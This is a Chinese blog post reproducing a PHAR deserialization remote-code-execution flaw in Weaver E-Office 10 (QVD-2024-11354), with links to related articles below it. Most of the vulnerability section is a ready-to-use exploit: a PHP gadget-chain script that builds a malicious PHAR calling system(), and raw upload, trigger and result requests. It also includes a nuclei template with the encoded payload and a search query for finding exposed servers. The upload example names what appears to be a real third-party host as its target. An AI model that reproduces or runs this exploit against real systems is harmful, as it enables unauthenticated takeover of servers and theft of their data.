(附nuclei yaml文件)泛微E-office 10 atuh-filephar反序列化命令执行漏洞复现(QVD-2024-11354)

于 2024-05-27 18:24:21 发布
阅读量808 收藏 4
点赞数 20
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nglj9527/article/details/139244549
版权

(附nuclei yaml文件)泛微E-office 10 atuh-filephar反序列化命令执行漏洞复现(QVD-2024-11354)

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

1、漏洞简介

泛微E-Offiсе10是一款企业级办公自动化系统,主要用于优化和管理企业的文档、信息流转、协作与沟通工作流程。
E-Offiсе10存在远程代码执行漏洞。由于系统处理上传的PHAR文件时存在缺陷,未经身份验证的远程攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的反序列化机制来触发远程代码执行。
影响产品:
1、 v10.0_20180516 < E-Office10 < v10.0_20240222

2、资产指纹

hunter: (web.body=“eoffice10”&&web.body=“eoffice_loading_tip”)&&is_domain=“true”

3、漏洞复现

(1)生成phar序列化文件,ipconfig可更改为任意准备执行的命令。

(参考https://xz.aliyun.com/t/6059?time__1311=n4%2BxnD0DRDgGG%3DG8%2BNDsA3xCqhlDu0DGwFTwD&alichlgref=https%3A%2F%2Fwww.baidu.com%2Flink%3Furl%3Dt5QkCymIxL-Hcxmr9DHqX9GPuyQJ8GMicE_3Y9jHDiQ4bd00oakXqqSmTFz5__q0%26wd%3D%26eqid%3D9dd63173007c68e70000000666058d3a
https://xz.aliyun.com/t/6699?time__1311=n4%2BxnD0DRDBGit30%3DKDsA3rbWYi%3DzWQrY4D&alichlgref=https%3A%2F%2Fcn.bing.com%2F
https://blog.csdn.net/KK_2018/article/details/104123687)

执行下面的php脚本序列化poc:

<?php
namespace Illuminate\Broadcasting{
    class PendingBroadcast
    {
        protected $events;
        protected $event;

        public function __construct($events="",$event="")
        {
            $this->events = $events;
            $this->event = $event;
        }
    }
}

namespace Illuminate\Bus{
    class Dispatcher
    {
        protected $queueResolver = "system";
    }
}

namespace Illuminate\Broadcasting{
    class BroadcastEvent
    {
        public $connection = "ipconfig";
    }
}
    
namespace{
    $d = new Illuminate\Bus\Dispatcher();
    $b = new Illuminate\Broadcasting\BroadcastEvent();
    $p = new Illuminate\Broadcasting\PendingBroadcast($d,$b);
    echo urlencode(serialize($p));
    @unlink("phar.phar");
    $phar = new Phar("phar.phar"); //后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub
    $phar->setMetadata($p); //将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();
}

?>
(2)序列化好的结果为一个phar文件。

在这里插入图片描述

(3)上传phar文件,获取回显中attachment_id值。
POST /eoffice10/server/public/api/attachment/atuh-file HTTP/1.1
Host: ljwx.lj028.cn:8011
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Length: 531
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Type: multipart/form-data; boundary=00sldjfpe0luoipeiq00
Accept-Encoding: gzip, deflate

--00sldjfpe0luoipeiq00
Content-Disposition: form-data; name="Filedata"; filename="register.inc"
Content-Type: image/jpeg

{粘贴phar文件的位置}
--00sldjfpe0luoipeiq00--

在这里插入图片描述

![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/f50d63340922452894d2844e198f6a98.png

(4)利用Phar:// 伪协议读取phar文件。
POST /eoffice10/server/public/api/attachment/path/migrate HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Length: 69
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

source_path=&desc_path=phar%3A%2F%2F..%2F..%2F..%2F..%2Fattachment%2F
(5)通过第一步获取的id获取命令执行结果。
POST /eoffice10/server/public/api/empower/import HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Length: 47
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

type=tttt&file={第一步获取的ID}

在这里插入图片描述

4、nuclei yaml文件

id: weaver-eoffice10-atuhfile-rce

info:
  name: weaver-eoffice10-atuhfile-rce
  author: XXX
  severity: critical
  description: 泛微E-office 10 atuh-file存在phar反序列化漏洞


variables:
  file: "R0lGODlhPD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8+DQomAQAAAQAAABEAAAABAAAAAADwAAAATzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjE6e3M6MTY6IgAqAHF1ZXVlUmVzb2x2ZXIiO3M6Njoic3lzdGVtIjt9czo4OiIAKgBldmVudCI7TzozODoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcQnJvYWRjYXN0RXZlbnQiOjE6e3M6MTA6ImNvbm5lY3Rpb24iO3M6ODoiaXBjb25maWciO319CAAAAHRlc3QudHh0BAAAAK4EDGYEAAAADH5/2LYBAAAAAAAAdGVzdGCDRQ1G9gG3bXmo1wFM4TXzF8m9NZSuW5egN8A9V50JAwAAAEdCTUI="

http:
  - raw:
    - |
      POST /eoffice10/server/public/api/attachment/atuh-file HTTP/1.1
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
      Content-Type: multipart/form-data; boundary=00sldjfpe0luoipeiq00
      Host: {{Hostname}}
      Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
      Content-Length: 517
      Connection: close

      --00sldjfpe0luoipeiq00
      Content-Disposition: form-data; name="Filedata"; filename="register.inc"
      Content-Type: image/jpeg

      {{base64_decode("{{file}}")}}
      --00sldjfpe0luoipeiq00--

    - |
      POST /eoffice10/server/public/api/attachment/path/migrate HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
      Content-Length: 69
      Content-Type: application/x-www-form-urlencoded
      Accept-Encoding: gzip, deflate
      Connection: close

      source_path=&desc_path=phar%3A%2F%2F..%2F..%2F..%2F..%2Fattachment%2F

    - |
      POST /eoffice10/server/public/api/empower/import HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
      Content-Length: 47
      Content-Type: application/x-www-form-urlencoded
      Accept-Encoding: gzip, deflate
      Connection: close

      type=tttt&file={{id}}

    extractors:
      - type: regex
        name: id
        group: 1
        regex: 
         - "\"attachment_id\":\"(.*?)\""
        internal: true
    
    matchers:
      - type: dsl
        dsl:
          - 'status_code_3==200 && contains_all(body_3,"IPv4")'
nglj9527
关注
  • 20
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
泛微E-Office10 远程代码执行漏洞复现(QVD-2024-11354)
0xSec
04-04 1763
2024年3月,互联网上披露泛微E-Office10存在远程代码执行漏洞,攻击者可利用该漏洞获取服务器控制权限。该漏洞利用简单,无需前置条件,漏洞的关键在于系统处理上传的PHAR文件时存在缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的反序列化机制来触发远程代码执行
泛微E-Office前台文件上传漏洞
失心少年
06-20 856
我们在第108行调用doc2text(),然后追溯到doc2txt()参数$FILE_PATH的源,连接件目录(C:\eoffice9\webroot\ATTACHMENT) 的数据表FLE_CONTENT中ATTACHMENT_ID和ATTACHMENT_NAME列的值,以获得完整的文件路径。天擎攻防实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
漏洞复现泛微E-office10 atuh-file 存在phar反序列化漏洞
https://blog.echo234.cn/
03-29 1437
泛微eoffice10协同办公平台是一款专业的office办公的工具软件。软件支持在线多人编辑文件,并且会在第一时间收发协作需求。十分方便快捷,界面简约,布局直观清晰,操作简单,极易上手,是一款不可多得的利器。泛微E-office 10 处理上传的PHAR文件时存在缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的反序列化机制来触发远程代码执行
漏洞复现--泛微E-Office 10任意文件上传漏洞
qq_53003652的博客
10-07 2444
泛微E-Office 1010.0_20230821 版本之前存在远程代码执行漏洞,该漏洞是通过文件上传配合文件包含实现远程代码执行,攻击者可利用此漏洞上传恶意文件并控制服务器。长亭应急团队经过分析后发现该漏洞是通过文件上传配合文件包含实现远程代码执行。近期,长亭科技监测到泛微官方发布了新补丁修复了一处远程代码执行漏洞
又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析
weixin_33910137的博客
09-19 459
本文讲的是又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析, 早在2015年,FireEye曾发布过两次关于Office的Encapsulated PostScript (EPS)图形文件漏洞攻击的研究分析,其中一次属于零日漏洞攻击。 今年3月开始,FireEye再一次在微软Office产品中陆续发现三个新的零日漏洞,发现时这些漏洞已被...
漏洞复现】2023HVV WPS Office 远程代码执行漏洞(RCE)
做自己喜欢的事,并将其发挥到极致!
09-08 2501
Office中的WebExtension是一种用于扩展Microsoft Office功能的技术。Office插件使第三方开发者能够在Office应用程序中集成自己的服务和功能。这些插件采用跨平台的Web技术(如HTML,CSS和JavaScript)开发,可以在不同的平台和设备上运行。简单理解就是Office内置了一个浏览器,可以解析html/javascript/css代码,本次的漏洞,就是WPS在处理WebExtension时,未能正确的处理javascript代码,造成了溢出RCE。
nuclei-templates:社区策划的用于核引擎的模板列表,以在应用程序中查找安全漏洞
03-10
核模板社区策划了用于原子引擎的模板列表,以在应用程序中发现安全漏洞。 •••• 模板是的核心,它们为实际的扫描引擎提供动力。 该存储库存储和容纳由我们团队提供以及社区贡献的各种扫描仪模板。 我们希望您也...
nuclei-docs:核文件
04-03
Nuclei文档网站的Github项目 nuclei-docs的本地版本安装mkdocs python3 -m pip install mkdocspython3 -m pip install pymdown-extensions>=7.0 --userpython3 -m pip install mkdocs-material-extensions>=1.0 --...
nuclei-3.0.1-windows-amd64
最新发布
06-05
nuclei-3.0.1-windows-amd64】是针对Windows操作系统64位架构的Nuclei工具的版本。Nuclei是一款快速、可配置的、基于模板的安全扫描工具,主要用于网络扫描和渗透测试,以检测目标系统中的已知漏洞。它是由安全...
Segment-White-Blood-Cell-Nuclei:用于白细胞核分割的算法
02-04
在Segment-White-Blood-Cell-Nuclei-master压缩包中,包含了完整的源代码、示例图像和详细的使用说明。这为研究者和开发者提供了学习和改进的基础,也便于将该算法应用到其他类似的问题中。 总结,Segment-White-...
WPS Office 代码执行漏洞(QVD-2023-17241)
08-13
WPS Office 代码执行漏洞(QVD-2023-17241)
continuous-nuclei:连续运行原子核
05-20
Please read "How to Scan Continuously with Nuclei?" article here: - https://medium.com/@dwisiswant0/how-to-scan-continuously-with-nuclei-fcb7e9d8b8b9
记一次泛微漏洞分析到发现未公开新漏洞
weixin_42508548的博客
01-10 3566
本来想着分析分析泛微eoffice最新出的漏洞CNVD-2021-49104的,分析分析着,发现代码好像有别的方法也存在..
泛微E-Office1010.0_20240222 远程代码执行漏洞
whoami
03-29 1041
在受影响版本中,由于处理上传的phar文件时存在缺陷,攻击者可通过向/eoffice10/server/public/api/attachment/atuh-file等地址上传恶意phar文件,利用针对phar反序列化触发远程代码执行泛微e-office是一套企业级电子办公解决方案,提供文档管理、流程审批、协同办公等功能,帮助企业实现数字化办公、提高工作效率。将 e-office10 升级至 10.0_20240222 及以上版本。
泛微最新漏洞汇总----实时更新!!!_泛微漏洞2024年最新网络安全程序员必会
erthre的博客
04-16 1194
知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。(img-tih2xQ74-1713254808442)]app.name=“泛微 e-cology 9.0 OA”
漏洞复现泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)
做自己喜欢的事,并将其发挥到极致!
05-10 3014
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微新一代移动办公平台E-Cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件,实体签章的方式,泛微OA E-Cology平台browser.jsp处存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限。
0day最新泛微E-Office10远程代码执行漏洞
weixin_43167326的博客
03-29 1085
泛微E-Office10是一款企业级办公自动化系统,主要用于优化和管理企业的文档、信息流转、协作与沟通工作流程。2024年3月,互联网上披露泛微E-Office10存在远程代码执行漏洞,攻击者可利用该漏洞获取服务器控制权限。该漏洞利用简单,无需前置条件,建议受影响的客户尽快修复漏洞
泛微OA E-Office V10 OfficeServer 任意文件上传漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
10-20 2150
泛微e-ofice是一款标准化的协同0A办公软件,泛微 E-ofice 10 0ficeServer 存在任意文件上传漏洞,攻击者可以上传任意文件,获取webshell,在服务器上执行任意命令、读取敏感信息等。
which riscv-nuclei-elf-gcc openocd make rm这个shell命令是什么意思
06-08
这条命令是用于查询系统中是否已经安装了名为 riscv-nuclei-elf-gcc、openocd、make 和 rm 的软件。它们分别是 riscv 架构下的嵌入式处理器编译工具链、开发调试工具、编译工具和文件删除工具。当您在命令行中输入 `which` 命令以及这些软件的名称时,系统会查找这些软件的可执行文件路径,并输出这些路径。如果输出为空,则说明您的系统中没有安装这些软件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值